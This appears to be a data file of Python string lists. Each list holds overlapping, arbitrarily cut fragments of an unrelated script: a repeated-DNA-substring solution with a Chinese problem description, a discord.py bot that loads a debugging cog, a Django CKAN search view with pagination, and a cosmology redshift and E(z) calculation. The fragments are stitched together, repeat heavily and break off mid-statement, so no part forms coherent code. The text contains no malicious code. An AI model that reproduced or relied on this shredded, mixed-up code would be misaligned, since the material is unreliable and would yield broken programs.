'AAAAACCCCCAAAAACCCCCCAAAAAGGGTTT' s2 =", "'__main__': s1 = 'AAAAACCCCCAAAAACCCCCCAAAAAGGGTTT' s2 = 'AAAAAAAAAAAAA' print(f\"For input DNA string: {s1}\" f\"\\n", "左边逐个迭代。 并且用两个set(), 一个用于存储已经见过的字符串,一个用于输出 \"\"\" def findRepeatedDnaSequence(sequence, length): n = len(sequence) seen = set()", "所有的DNA都是由一系列缩写为`A`, `C`, `G`, `T`的核苷酸组成, 例如: `ACGAATTCCG`。在研究DNA时,识别DNA中重复的序列有时候会对研究很有帮助。 编写一个函数, 找出所有的目标子串,目标子串长度为`L`, 且在DNA字符串`s` 中出现次数超过一次 **test case** >>>", "\"\"\" 所有的DNA都是由一系列缩写为`A`, `C`, `G`, `T`的核苷酸组成, 例如: `ACGAATTCCG`。在研究DNA时,识别DNA中重复的序列有时候会对研究很有帮助。 编写一个函数, 找出所有的目标子串,目标子串长度为`L`, 且在DNA字符串`s` 中出现次数超过一次 **test 
case**", "iterate over all sequences of length for start in range(n - length +", "if __name__ == '__main__': s1 = 'AAAAACCCCCAAAAACCCCCCAAAAAGGGTTT' s2 = 'AAAAAAAAAAAAA' print(f\"For input DNA", "findRepeatedDnaSequence(sequence=s, length=10) ['AAAAACCCCC', 'CCCCCAAAAA'] >>> s = 'AAAAAAAAAAAAA' >>> findRepeatedDnaSequence(sequence=s, length=10) ['AAAAAAAAAA'] #", "of length for start in range(n - length + 1): tmp = sequence[start:start", "s1 = 'AAAAACCCCCAAAAACCCCCCAAAAAGGGTTT' s2 = 'AAAAAAAAAAAAA' print(f\"For input DNA string: {s1}\" f\"\\n The", "\"\"\" def findRepeatedDnaSequence(sequence, length): n = len(sequence) seen = set() output = set()", "= len(sequence) seen = set() output = set() # iterate over all sequences", "n = len(sequence) seen = set() output = set() # iterate over all", "print(f\"For input DNA string: {s1}\" f\"\\n The Repeated subSequence is: {findRepeatedDnaSequence(sequence=s1, length=10)}\") print(f\"For", "sequences of length for start in range(n - length + 1): tmp =", "== '__main__': s1 = 'AAAAACCCCCAAAAACCCCCCAAAAAGGGTTT' s2 = 'AAAAAAAAAAAAA' print(f\"For input DNA string: {s1}\"", "in seen: output.add(tmp[:]) seen.add(tmp) return list(output) if __name__ == '__main__': s1 = 'AAAAACCCCCAAAAACCCCCCAAAAAGGGTTT'", "'AAAAAAAAAAAAA' print(f\"For input DNA string: {s1}\" f\"\\n The Repeated subSequence is: {findRepeatedDnaSequence(sequence=s1, length=10)}\")", "= set() output = set() # iterate over all sequences of length for", "- length + 1): tmp = sequence[start:start + length] if tmp in seen:", "= 'AAAAAAAAAAAAA' >>> findRepeatedDnaSequence(sequence=s, length=10) ['AAAAAAAAAA'] # Solution *** ## Approach 1 简单固定长度滑动窗口,", "len(sequence) seen = set() output = set() # iterate over all sequences of", "= 'AAAAACCCCCAAAAACCCCCCAAAAAGGGTTT' s2 = 'AAAAAAAAAAAAA' print(f\"For input DNA string: {s1}\" f\"\\n The Repeated", "length): n = len(sequence) seen = set() output = set() # iterate over", "['AAAAAAAAAA'] # Solution *** ## Approach 1 简单固定长度滑动窗口, 长度为L, 左边逐个迭代。 并且用两个set(), 一个用于存储已经见过的字符串,一个用于输出 \"\"\"" ]
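# The docstring examples can be exercised directly; note that list(output)
# comes from a set, so element order is not guaranteed, and sorting before
# comparing makes the check deterministic. This runner is a sketch, not part
# of the original solution.
assert sorted(findRepeatedDnaSequence('AAAAACCCCCAAAAACCCCCCAAAAAGGGTTT', 10)) == \
    ['AAAAACCCCC', 'CCCCCAAAAA']
assert findRepeatedDnaSequence('AAAAAAAAAAAAA', 10) == ['AAAAAAAAAA']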
[ "the database.\"\"\" return commands.when_mentioned_or(\"onyx \") def __init__(self): \"\"\"Initialize the bot and load all", "import os class Bot(commands.Bot): async def get_prefix(self, bot, message): \"\"\"Fetches the current prefix", "Bot(commands.Bot): async def get_prefix(self, bot, message): \"\"\"Fetches the current prefix in the guild", "= \"UTF-8\") as f: self.config = yaml.safe_load(f) super().__init__( command_prefix = self.get_prefix, intents =", "os class Bot(commands.Bot): async def get_prefix(self, bot, message): \"\"\"Fetches the current prefix in", "the guild from the database.\"\"\" return commands.when_mentioned_or(\"onyx \") def __init__(self): \"\"\"Initialize the bot", "\"UTF-8\") as f: self.config = yaml.safe_load(f) super().__init__( command_prefix = self.get_prefix, intents = discord.Intents.default()", "message): \"\"\"Fetches the current prefix in the guild from the database.\"\"\" return commands.when_mentioned_or(\"onyx", "from the database.\"\"\" return commands.when_mentioned_or(\"onyx \") def __init__(self): \"\"\"Initialize the bot and load", "commands import discord import yaml import os class Bot(commands.Bot): async def get_prefix(self, bot,", "import discord import yaml import os class Bot(commands.Bot): async def get_prefix(self, bot, message):", "extensions.\"\"\" with open(\"C:/onyx/config.yml\", encoding = \"UTF-8\") as f: self.config = yaml.safe_load(f) super().__init__( command_prefix", "open(\"C:/onyx/config.yml\", encoding = \"UTF-8\") as f: self.config = yaml.safe_load(f) super().__init__( command_prefix = self.get_prefix,", "super().__init__( command_prefix = self.get_prefix, intents = discord.Intents.default() ) client = Bot() client.load_extension(\"jishaku\") #", "yaml import os class Bot(commands.Bot): async def get_prefix(self, bot, message): \"\"\"Fetches the current", "commands.when_mentioned_or(\"onyx \") def __init__(self): \"\"\"Initialize the bot and load all extensions.\"\"\" with open(\"C:/onyx/config.yml\",", "= Bot() client.load_extension(\"jishaku\") # Load the debugging cog. @client.check async def check(ctx): return", ") client = Bot() client.load_extension(\"jishaku\") # Load the debugging cog. @client.check async def", "from discord.ext import commands import discord import yaml import os class Bot(commands.Bot): async", "Load the debugging cog. 
@client.check async def check(ctx): return True token = os.getenv(\"TOKEN\")", "\") def __init__(self): \"\"\"Initialize the bot and load all extensions.\"\"\" with open(\"C:/onyx/config.yml\", encoding", "current prefix in the guild from the database.\"\"\" return commands.when_mentioned_or(\"onyx \") def __init__(self):", "as f: self.config = yaml.safe_load(f) super().__init__( command_prefix = self.get_prefix, intents = discord.Intents.default() )", "def get_prefix(self, bot, message): \"\"\"Fetches the current prefix in the guild from the", "discord import yaml import os class Bot(commands.Bot): async def get_prefix(self, bot, message): \"\"\"Fetches", "\"\"\"Initialize the bot and load all extensions.\"\"\" with open(\"C:/onyx/config.yml\", encoding = \"UTF-8\") as", "the bot and load all extensions.\"\"\" with open(\"C:/onyx/config.yml\", encoding = \"UTF-8\") as f:", "load all extensions.\"\"\" with open(\"C:/onyx/config.yml\", encoding = \"UTF-8\") as f: self.config = yaml.safe_load(f)", "yaml.safe_load(f) super().__init__( command_prefix = self.get_prefix, intents = discord.Intents.default() ) client = Bot() client.load_extension(\"jishaku\")", "client.load_extension(\"jishaku\") # Load the debugging cog. @client.check async def check(ctx): return True token", "the current prefix in the guild from the database.\"\"\" return commands.when_mentioned_or(\"onyx \") def", "self.config = yaml.safe_load(f) super().__init__( command_prefix = self.get_prefix, intents = discord.Intents.default() ) client =", "command_prefix = self.get_prefix, intents = discord.Intents.default() ) client = Bot() client.load_extension(\"jishaku\") # Load", "__init__(self): \"\"\"Initialize the bot and load all extensions.\"\"\" with open(\"C:/onyx/config.yml\", encoding = \"UTF-8\")", "client = Bot() client.load_extension(\"jishaku\") # Load the debugging cog. @client.check async def check(ctx):", "return commands.when_mentioned_or(\"onyx \") def __init__(self): \"\"\"Initialize the bot and load all extensions.\"\"\" with", "all extensions.\"\"\" with open(\"C:/onyx/config.yml\", encoding = \"UTF-8\") as f: self.config = yaml.safe_load(f) super().__init__(", "def __init__(self): \"\"\"Initialize the bot and load all extensions.\"\"\" with open(\"C:/onyx/config.yml\", encoding =", "bot, message): \"\"\"Fetches the current prefix in the guild from the database.\"\"\" return", "prefix in the guild from the database.\"\"\" return commands.when_mentioned_or(\"onyx \") def __init__(self): \"\"\"Initialize", "and load all extensions.\"\"\" with open(\"C:/onyx/config.yml\", encoding = \"UTF-8\") as f: self.config =", "discord.ext import commands import discord import yaml import os class Bot(commands.Bot): async def", "the debugging cog. @client.check async def check(ctx): return True token = os.getenv(\"TOKEN\") client.run(token)", "f: self.config = yaml.safe_load(f) super().__init__( command_prefix = self.get_prefix, intents = discord.Intents.default() ) client", "= discord.Intents.default() ) client = Bot() client.load_extension(\"jishaku\") # Load the debugging cog. @client.check", "\"\"\"Fetches the current prefix in the guild from the database.\"\"\" return commands.when_mentioned_or(\"onyx \")", "Bot() client.load_extension(\"jishaku\") # Load the debugging cog. 
@client.check async def check(ctx): return True", "import commands import discord import yaml import os class Bot(commands.Bot): async def get_prefix(self,", "in the guild from the database.\"\"\" return commands.when_mentioned_or(\"onyx \") def __init__(self): \"\"\"Initialize the", "bot and load all extensions.\"\"\" with open(\"C:/onyx/config.yml\", encoding = \"UTF-8\") as f: self.config", "async def get_prefix(self, bot, message): \"\"\"Fetches the current prefix in the guild from", "with open(\"C:/onyx/config.yml\", encoding = \"UTF-8\") as f: self.config = yaml.safe_load(f) super().__init__( command_prefix =", "import yaml import os class Bot(commands.Bot): async def get_prefix(self, bot, message): \"\"\"Fetches the", "database.\"\"\" return commands.when_mentioned_or(\"onyx \") def __init__(self): \"\"\"Initialize the bot and load all extensions.\"\"\"", "# Load the debugging cog. @client.check async def check(ctx): return True token =", "encoding = \"UTF-8\") as f: self.config = yaml.safe_load(f) super().__init__( command_prefix = self.get_prefix, intents", "class Bot(commands.Bot): async def get_prefix(self, bot, message): \"\"\"Fetches the current prefix in the", "= yaml.safe_load(f) super().__init__( command_prefix = self.get_prefix, intents = discord.Intents.default() ) client = Bot()", "= self.get_prefix, intents = discord.Intents.default() ) client = Bot() client.load_extension(\"jishaku\") # Load the", "self.get_prefix, intents = discord.Intents.default() ) client = Bot() client.load_extension(\"jishaku\") # Load the debugging", "intents = discord.Intents.default() ) client = Bot() client.load_extension(\"jishaku\") # Load the debugging cog.", "guild from the database.\"\"\" return commands.when_mentioned_or(\"onyx \") def __init__(self): \"\"\"Initialize the bot and", "get_prefix(self, bot, message): \"\"\"Fetches the current prefix in the guild from the database.\"\"\"", "discord.Intents.default() ) client = Bot() client.load_extension(\"jishaku\") # Load the debugging cog. @client.check async" ]
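# The script above follows the discord.py 1.x API, where Bot.load_extension
# is a plain method. On discord.py 2.x extension loading became a coroutine,
# so a sketch like the following would be needed instead (setup_hook and the
# awaited call are the 2.x idiom; treat this as an assumption about the
# target library version, not the author's code):
class BotV2(commands.Bot):
    async def setup_hook(self):
        # Runs once after login, before any events are dispatched.
        await self.load_extension("jishaku")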
[ "google.students() total = response['total'] pages_count = total//10+bool(total%10) actual_page = start_pos//page_size + 1 parsed_url", "request.GET: response = google.students(request.GET.getlist('selected_tags'), request.GET.getlist('selected_unis'), start=start_pos, rows=page_size ) else: response = google.students() total", "response = google.students() total = response['total'] pages_count = total//10+bool(total%10) actual_page = start_pos//page_size +", "[{'number': n, 'url': change_url(n), 'active': n == actual_page} for n in range(1, pages_count)]", "= { \"pages\": pages, \"prev\": actual_page > 1, \"next\": actual_page < pages_count, }", "n parsed_url[4] = urllib.parse.urlencode(options) return urllib.parse.urlunparse(parsed_url) pages = [{'number': n, 'url': change_url(n), 'active':", "..ckan_model import production as ckan import django.http def index(request: django.http.HttpRequest): payload = {}", "as ckan import django.http def index(request: django.http.HttpRequest): payload = {} google = ckan.Search()", "1 parsed_url = list(urllib.parse.urlparse(request.get_full_path())) options = dict(urllib.parse.parse_qsl(parsed_url[4])) def change_url(n): options['page'] = n parsed_url[4]", "ckan import django.http def index(request: django.http.HttpRequest): payload = {} google = ckan.Search() payload['top_tags']", "def search(request: django.http.HttpRequest): # it's a search engine! google = ckan.Search() payload =", "payload = {} payload['tags'] = google.tags_list() payload['unis'] = google.university_list() page = int(request.GET.get('page', 1))", "= (page - 1) * page_size if request.GET: response = google.students(request.GET.getlist('selected_tags'), request.GET.getlist('selected_unis'), start=start_pos,", "start_pos = (page - 1) * page_size if request.GET: response = google.students(request.GET.getlist('selected_tags'), request.GET.getlist('selected_unis'),", "options['page'] = n parsed_url[4] = urllib.parse.urlencode(options) return urllib.parse.urlunparse(parsed_url) pages = [{'number': n, 'url':", "pages, \"prev\": actual_page > 1, \"next\": actual_page < pages_count, } payload['results'] = response['results']", "urllib.parse.urlunparse(parsed_url) pages = [{'number': n, 'url': change_url(n), 'active': n == actual_page} for n", "= list(urllib.parse.urlparse(request.get_full_path())) options = dict(urllib.parse.parse_qsl(parsed_url[4])) def change_url(n): options['page'] = n parsed_url[4] = urllib.parse.urlencode(options)", "as ckan from ckan_model import production as ckan #from ..ckan_model import production as", "ckan_model import stub as ckan from ckan_model import production as ckan #from ..ckan_model", "= response['total'] pages_count = total//10+bool(total%10) actual_page = start_pos//page_size + 1 parsed_url = list(urllib.parse.urlparse(request.get_full_path()))", "production as ckan import django.http def index(request: django.http.HttpRequest): payload = {} google =", "payload['top_tags'] = google.top_tags() return render(request, 'index.html', context=payload) def search(request: django.http.HttpRequest): # it's a", "= {} payload['tags'] = google.tags_list() payload['unis'] = google.university_list() page = int(request.GET.get('page', 1)) page_size", "import production as ckan #from ..ckan_model import production as ckan import django.http def", "1, \"next\": actual_page < pages_count, } payload['results'] = response['results'] return render(request, 'search.html', payload)", "'index.html', context=payload) def search(request: django.http.HttpRequest): # it's a 
search engine! google = ckan.Search()", "dict(urllib.parse.parse_qsl(parsed_url[4])) def change_url(n): options['page'] = n parsed_url[4] = urllib.parse.urlencode(options) return urllib.parse.urlunparse(parsed_url) pages =", "django.shortcuts import render #from ckan_model import stub as ckan from ckan_model import production", "= n parsed_url[4] = urllib.parse.urlencode(options) return urllib.parse.urlunparse(parsed_url) pages = [{'number': n, 'url': change_url(n),", "google.university_list() page = int(request.GET.get('page', 1)) page_size = 10 start_pos = (page - 1)", "change_url(n), 'active': n == actual_page} for n in range(1, pages_count)] payload[\"pagination\"] = {", "parsed_url = list(urllib.parse.urlparse(request.get_full_path())) options = dict(urllib.parse.parse_qsl(parsed_url[4])) def change_url(n): options['page'] = n parsed_url[4] =", "ckan #from ..ckan_model import production as ckan import django.http def index(request: django.http.HttpRequest): payload", "\"pages\": pages, \"prev\": actual_page > 1, \"next\": actual_page < pages_count, } payload['results'] =", "page_size if request.GET: response = google.students(request.GET.getlist('selected_tags'), request.GET.getlist('selected_unis'), start=start_pos, rows=page_size ) else: response =", "google.top_tags() return render(request, 'index.html', context=payload) def search(request: django.http.HttpRequest): # it's a search engine!", "'url': change_url(n), 'active': n == actual_page} for n in range(1, pages_count)] payload[\"pagination\"] =", "from django.shortcuts import render #from ckan_model import stub as ckan from ckan_model import", "context=payload) def search(request: django.http.HttpRequest): # it's a search engine! google = ckan.Search() payload", "{ \"pages\": pages, \"prev\": actual_page > 1, \"next\": actual_page < pages_count, } payload['results']", "as ckan #from ..ckan_model import production as ckan import django.http def index(request: django.http.HttpRequest):", "urllib.parse from django.shortcuts import render #from ckan_model import stub as ckan from ckan_model", "def change_url(n): options['page'] = n parsed_url[4] = urllib.parse.urlencode(options) return urllib.parse.urlunparse(parsed_url) pages = [{'number':", "production as ckan #from ..ckan_model import production as ckan import django.http def index(request:", "= [{'number': n, 'url': change_url(n), 'active': n == actual_page} for n in range(1,", "django.http def index(request: django.http.HttpRequest): payload = {} google = ckan.Search() payload['top_tags'] = google.top_tags()", "ckan from ckan_model import production as ckan #from ..ckan_model import production as ckan", "return render(request, 'index.html', context=payload) def search(request: django.http.HttpRequest): # it's a search engine! 
google", "= google.university_list() page = int(request.GET.get('page', 1)) page_size = 10 start_pos = (page -", "ckan.Search() payload = {} payload['tags'] = google.tags_list() payload['unis'] = google.university_list() page = int(request.GET.get('page',", "payload['tags'] = google.tags_list() payload['unis'] = google.university_list() page = int(request.GET.get('page', 1)) page_size = 10", "= google.tags_list() payload['unis'] = google.university_list() page = int(request.GET.get('page', 1)) page_size = 10 start_pos", "actual_page} for n in range(1, pages_count)] payload[\"pagination\"] = { \"pages\": pages, \"prev\": actual_page", "== actual_page} for n in range(1, pages_count)] payload[\"pagination\"] = { \"pages\": pages, \"prev\":", "= total//10+bool(total%10) actual_page = start_pos//page_size + 1 parsed_url = list(urllib.parse.urlparse(request.get_full_path())) options = dict(urllib.parse.parse_qsl(parsed_url[4]))", "google.tags_list() payload['unis'] = google.university_list() page = int(request.GET.get('page', 1)) page_size = 10 start_pos =", "'active': n == actual_page} for n in range(1, pages_count)] payload[\"pagination\"] = { \"pages\":", "#from ckan_model import stub as ckan from ckan_model import production as ckan #from", "django.http.HttpRequest): payload = {} google = ckan.Search() payload['top_tags'] = google.top_tags() return render(request, 'index.html',", "= dict(urllib.parse.parse_qsl(parsed_url[4])) def change_url(n): options['page'] = n parsed_url[4] = urllib.parse.urlencode(options) return urllib.parse.urlunparse(parsed_url) pages", "engine! google = ckan.Search() payload = {} payload['tags'] = google.tags_list() payload['unis'] = google.university_list()", "response['total'] pages_count = total//10+bool(total%10) actual_page = start_pos//page_size + 1 parsed_url = list(urllib.parse.urlparse(request.get_full_path())) options", "search engine! 
import urllib.parse

from django.shortcuts import render
#from ckan_model import stub as ckan
from ckan_model import production as ckan
#from ..ckan_model import production as ckan
import django.http


def index(request: django.http.HttpRequest):
    payload = {}
    google = ckan.Search()
    payload['top_tags'] = google.top_tags()
    return render(request, 'index.html', context=payload)


def search(request: django.http.HttpRequest):
    # it's a search engine!
    google = ckan.Search()
    payload = {}
    payload['tags'] = google.tags_list()
    payload['unis'] = google.university_list()

    page = int(request.GET.get('page', 1))
    page_size = 10
    start_pos = (page - 1) * page_size
    if request.GET:
        response = google.students(request.GET.getlist('selected_tags'),
                                   request.GET.getlist('selected_unis'),
                                   start=start_pos,
                                   rows=page_size)
    else:
        response = google.students()

    total = response['total']
    pages_count = total // page_size + bool(total % page_size)  # ceil(total / page_size)
    actual_page = start_pos // page_size + 1

    parsed_url = list(urllib.parse.urlparse(request.get_full_path()))
    options = dict(urllib.parse.parse_qsl(parsed_url[4]))

    def change_url(n):
        # Rebuild the current URL with its 'page' query parameter set to n.
        options['page'] = n
        parsed_url[4] = urllib.parse.urlencode(options)
        return urllib.parse.urlunparse(parsed_url)

    # Page numbers run 1..pages_count inclusive.
    pages = [{'number': n, 'url': change_url(n), 'active': n == actual_page}
             for n in range(1, pages_count + 1)]
    payload["pagination"] = {
        "pages": pages,
        "prev": actual_page > 1,
        "next": actual_page < pages_count,
    }
    payload['results'] = response['results']
    return render(request, 'search.html', context=payload)
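The two views above depend only on four methods of ckan.Search. A minimal stand-in in the spirit of the commented-out stub import is enough to exercise them without a live CKAN backend; every name and value below is invented for illustration.

# Hypothetical stand-in for ckan_model.stub.Search; all data here is fake.
class Search:
    def top_tags(self):
        return ['python', 'django', 'ckan']

    def tags_list(self):
        return ['python', 'django', 'ckan', 'search']

    def university_list(self):
        return ['Example University']

    def students(self, tags=None, unis=None, start=0, rows=10):
        # Same shape as the real response: a total count plus one page of results.
        results = [{'name': 'student %d' % i} for i in range(start, start + rows)]
        return {'total': 42, 'results': results}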
[ "= Redshift(0.84, 2.07, -0.7, z=z) Rp = R / (1+z) * Eall plt.plot(z,Rp,'-k')", "dz = z[1] - z[0] E = Efunc(z) Eics = np.zeros(E.shape) for i", "z1) + rbrk * Rhigh * (z > z1) R *= n0 /", "> z1) R *= n0 / R[0] return z, R z, R =", "= np.power((1.0 + z1), n1 - n2) R = Rlow * (z <=", "#Eics[1:] = Eics[:-1] #Eics[0] = 0 Eall = Eics / E; z =", "+ z), n2) rbrk = np.power((1.0 + z1), n1 - n2) R =", "/ E) * dz) #Eics[1:] = Eics[:-1] #Eics[0] = 0 Eall = Eics", "n2) rbrk = np.power((1.0 + z1), n1 - n2) R = Rlow *", "z = z.reshape(z.shape[0],1) E = E.reshape(E.shape[0],1) Eics = Eics.reshape(Eics.shape[0],1) Eall = Eall.reshape(Eall.shape[0],1) d", "R = Rlow * (z <= z1) + rbrk * Rhigh * (z", "#plt.gca().set_yscale('log') plt.show() #### This computes E(z) and int_0^z dz'/E(z') and saves to file", "Eics = np.zeros(E.shape) for i in range(len(Eics)): Eics[i] = (quad(Efuncinv, 0, z[i])[0])**2.0 #Eics", "/ E; z = z.reshape(z.shape[0],1) E = E.reshape(E.shape[0],1) Eics = Eics.reshape(Eics.shape[0],1) Eall =", "Omega_m = 0.274 Omega_lambda = 0.726 E = np.sqrt(Omega_m * np.power((1 + z),", "= np.sqrt(Omega_m * np.power((1 + z), 3) + Omega_lambda) return E def Efuncinv(z):", "Efunc(z) z = np.linspace(0,10,num=1001) dz = z[1] - z[0] E = Efunc(z) Eics", "z), n2) rbrk = np.power((1.0 + z1), n1 - n2) R = Rlow", "+ z1), n1 - n2) R = Rlow * (z <= z1) +", "np.power((1 + z), 3) + Omega_lambda) return E def Efuncinv(z): return 1.0 /", "Redshift(0.84, 2.07, -0.7, z=z) Rp = R / (1+z) * Eall plt.plot(z,Rp,'-k') plt.plot(z,R/(1+z),'--b')", "0, z[i])[0])**2.0 #Eics = np.square(np.cumsum(1.0 / E) * dz) #Eics[1:] = Eics[:-1] #Eics[0]", "and saves to file def Efunc(z): Omega_m = 0.274 Omega_lambda = 0.726 E", "Rhigh = np.power((1.0 + z), n2) rbrk = np.power((1.0 + z1), n1 -", "d = np.concatenate((z,E,Eics,Eall),axis=1) np.savetxt('support_data/splines_Ez.txt',d,fmt='%0.9lf') z2, R = Redshift(0.84, 2.07, -0.7, z=z) Rp =", "(z <= z1) + rbrk * Rhigh * (z > z1) R *=", "matplotlib.pyplot as plt def Redshift(n0, n1, n2, z1=3.6, z=np.linspace(0,10,num=1001)): Rlow = np.power((1.0 +", "dz) #Eics[1:] = Eics[:-1] #Eics[0] = 0 Eall = Eics / E; z", "z), n1) Rhigh = np.power((1.0 + z), n2) rbrk = np.power((1.0 + z1),", "Rlow * (z <= z1) + rbrk * Rhigh * (z > z1)", "z=np.linspace(0,10,num=1001)): Rlow = np.power((1.0 + z), n1) Rhigh = np.power((1.0 + z), n2)", "from scipy.integrate import quad import matplotlib.pyplot as plt def Redshift(n0, n1, n2, z1=3.6,", "= Eall.reshape(Eall.shape[0],1) d = np.concatenate((z,E,Eics,Eall),axis=1) np.savetxt('support_data/splines_Ez.txt',d,fmt='%0.9lf') z2, R = Redshift(0.84, 2.07, -0.7, z=z)", "R z, R = Redshift(0.84, 2.07, -0.7) plt.plot(z,R,'-k') plt.xlabel(r'$z$') plt.ylabel(r'$\\mathcal{R}(z)$') plt.grid() #plt.gca().set_yscale('log') plt.show()", "R *= n0 / R[0] return z, R z, R = Redshift(0.84, 2.07,", "import numpy as np from scipy.integrate import quad import matplotlib.pyplot as plt def", "- n2) R = Rlow * (z <= z1) + rbrk * Rhigh", "Rlow = np.power((1.0 + z), n1) Rhigh = np.power((1.0 + z), n2) rbrk", "* (z <= z1) + rbrk * Rhigh * (z > z1) R", "saves to file def Efunc(z): Omega_m = 0.274 Omega_lambda = 0.726 E =", "= np.concatenate((z,E,Eics,Eall),axis=1) np.savetxt('support_data/splines_Ez.txt',d,fmt='%0.9lf') z2, R = Redshift(0.84, 2.07, -0.7, z=z) Rp = R", "<= z1) + rbrk * Rhigh * (z > z1) R *= n0", "(z > z1) R *= n0 / R[0] return z, R z, R", "= 0 Eall = Eics / E; z = z.reshape(z.shape[0],1) E = E.reshape(E.shape[0],1)", "z1), n1 - n2) R = Rlow * (z <= z1) + rbrk", "z[0] E = Efunc(z) 
Eics = np.zeros(E.shape) for i in range(len(Eics)): Eics[i] =", "Rp = R / (1+z) * Eall plt.plot(z,Rp,'-k') plt.plot(z,R/(1+z),'--b') plt.plot(z,Eall,'-.r') #plt.plot(z,np.cumsum(Eall),'-g') plt.xlabel(r'$z$') plt.grid()", "z1=3.6, z=np.linspace(0,10,num=1001)): Rlow = np.power((1.0 + z), n1) Rhigh = np.power((1.0 + z),", "def Efuncinv(z): return 1.0 / Efunc(z) z = np.linspace(0,10,num=1001) dz = z[1] -", "plt.show() #### This computes E(z) and int_0^z dz'/E(z') and saves to file def", "Efuncinv(z): return 1.0 / Efunc(z) z = np.linspace(0,10,num=1001) dz = z[1] - z[0]", "np.square(np.cumsum(1.0 / E) * dz) #Eics[1:] = Eics[:-1] #Eics[0] = 0 Eall =", "*= n0 / R[0] return z, R z, R = Redshift(0.84, 2.07, -0.7)", "= Eics.reshape(Eics.shape[0],1) Eall = Eall.reshape(Eall.shape[0],1) d = np.concatenate((z,E,Eics,Eall),axis=1) np.savetxt('support_data/splines_Ez.txt',d,fmt='%0.9lf') z2, R = Redshift(0.84,", "= Rlow * (z <= z1) + rbrk * Rhigh * (z >", "E def Efuncinv(z): return 1.0 / Efunc(z) z = np.linspace(0,10,num=1001) dz = z[1]", "= np.power((1.0 + z), n1) Rhigh = np.power((1.0 + z), n2) rbrk =", "z, R = Redshift(0.84, 2.07, -0.7) plt.plot(z,R,'-k') plt.xlabel(r'$z$') plt.ylabel(r'$\\mathcal{R}(z)$') plt.grid() #plt.gca().set_yscale('log') plt.show() ####", "0.274 Omega_lambda = 0.726 E = np.sqrt(Omega_m * np.power((1 + z), 3) +", "- z[0] E = Efunc(z) Eics = np.zeros(E.shape) for i in range(len(Eics)): Eics[i]", "plt def Redshift(n0, n1, n2, z1=3.6, z=np.linspace(0,10,num=1001)): Rlow = np.power((1.0 + z), n1)", "(quad(Efuncinv, 0, z[i])[0])**2.0 #Eics = np.square(np.cumsum(1.0 / E) * dz) #Eics[1:] = Eics[:-1]", "Redshift(n0, n1, n2, z1=3.6, z=np.linspace(0,10,num=1001)): Rlow = np.power((1.0 + z), n1) Rhigh =", "z[1] - z[0] E = Efunc(z) Eics = np.zeros(E.shape) for i in range(len(Eics)):", "for i in range(len(Eics)): Eics[i] = (quad(Efuncinv, 0, z[i])[0])**2.0 #Eics = np.square(np.cumsum(1.0 /", "= Redshift(0.84, 2.07, -0.7) plt.plot(z,R,'-k') plt.xlabel(r'$z$') plt.ylabel(r'$\\mathcal{R}(z)$') plt.grid() #plt.gca().set_yscale('log') plt.show() #### This computes", "def Efunc(z): Omega_m = 0.274 Omega_lambda = 0.726 E = np.sqrt(Omega_m * np.power((1", "np.zeros(E.shape) for i in range(len(Eics)): Eics[i] = (quad(Efuncinv, 0, z[i])[0])**2.0 #Eics = np.square(np.cumsum(1.0", "* (z > z1) R *= n0 / R[0] return z, R z,", "Omega_lambda) return E def Efuncinv(z): return 1.0 / Efunc(z) z = np.linspace(0,10,num=1001) dz", "Eall = Eics / E; z = z.reshape(z.shape[0],1) E = E.reshape(E.shape[0],1) Eics =", "/ R[0] return z, R z, R = Redshift(0.84, 2.07, -0.7) plt.plot(z,R,'-k') plt.xlabel(r'$z$')", "rbrk * Rhigh * (z > z1) R *= n0 / R[0] return", "* dz) #Eics[1:] = Eics[:-1] #Eics[0] = 0 Eall = Eics / E;", "n1) Rhigh = np.power((1.0 + z), n2) rbrk = np.power((1.0 + z1), n1", "int_0^z dz'/E(z') and saves to file def Efunc(z): Omega_m = 0.274 Omega_lambda =", "= Efunc(z) Eics = np.zeros(E.shape) for i in range(len(Eics)): Eics[i] = (quad(Efuncinv, 0,", "= np.zeros(E.shape) for i in range(len(Eics)): Eics[i] = (quad(Efuncinv, 0, z[i])[0])**2.0 #Eics =", "= np.power((1.0 + z), n2) rbrk = np.power((1.0 + z1), n1 - n2)", "range(len(Eics)): Eics[i] = (quad(Efuncinv, 0, z[i])[0])**2.0 #Eics = np.square(np.cumsum(1.0 / E) * dz)", "= 0.274 Omega_lambda = 0.726 E = np.sqrt(Omega_m * np.power((1 + z), 3)", "n1 - n2) R = Rlow * (z <= z1) + rbrk *", "#### This computes E(z) and int_0^z dz'/E(z') and saves to file def Efunc(z):", "z[i])[0])**2.0 #Eics = np.square(np.cumsum(1.0 / E) * dz) #Eics[1:] = Eics[:-1] #Eics[0] 
=", "numpy as np from scipy.integrate import quad import matplotlib.pyplot as plt def Redshift(n0,", "z, R z, R = Redshift(0.84, 2.07, -0.7) plt.plot(z,R,'-k') plt.xlabel(r'$z$') plt.ylabel(r'$\\mathcal{R}(z)$') plt.grid() #plt.gca().set_yscale('log')", "scipy.integrate import quad import matplotlib.pyplot as plt def Redshift(n0, n1, n2, z1=3.6, z=np.linspace(0,10,num=1001)):", "n2, z1=3.6, z=np.linspace(0,10,num=1001)): Rlow = np.power((1.0 + z), n1) Rhigh = np.power((1.0 +", "computes E(z) and int_0^z dz'/E(z') and saves to file def Efunc(z): Omega_m =", "n0 / R[0] return z, R z, R = Redshift(0.84, 2.07, -0.7) plt.plot(z,R,'-k')", "plt.ylabel(r'$\\mathcal{R}(z)$') plt.grid() #plt.gca().set_yscale('log') plt.show() #### This computes E(z) and int_0^z dz'/E(z') and saves", "z1) R *= n0 / R[0] return z, R z, R = Redshift(0.84,", "R = Redshift(0.84, 2.07, -0.7, z=z) Rp = R / (1+z) * Eall", "np.concatenate((z,E,Eics,Eall),axis=1) np.savetxt('support_data/splines_Ez.txt',d,fmt='%0.9lf') z2, R = Redshift(0.84, 2.07, -0.7, z=z) Rp = R /", "Redshift(0.84, 2.07, -0.7) plt.plot(z,R,'-k') plt.xlabel(r'$z$') plt.ylabel(r'$\\mathcal{R}(z)$') plt.grid() #plt.gca().set_yscale('log') plt.show() #### This computes E(z)", "Efunc(z): Omega_m = 0.274 Omega_lambda = 0.726 E = np.sqrt(Omega_m * np.power((1 +", "Eall.reshape(Eall.shape[0],1) d = np.concatenate((z,E,Eics,Eall),axis=1) np.savetxt('support_data/splines_Ez.txt',d,fmt='%0.9lf') z2, R = Redshift(0.84, 2.07, -0.7, z=z) Rp", "+ rbrk * Rhigh * (z > z1) R *= n0 / R[0]", "* np.power((1 + z), 3) + Omega_lambda) return E def Efuncinv(z): return 1.0", "Eics = Eics.reshape(Eics.shape[0],1) Eall = 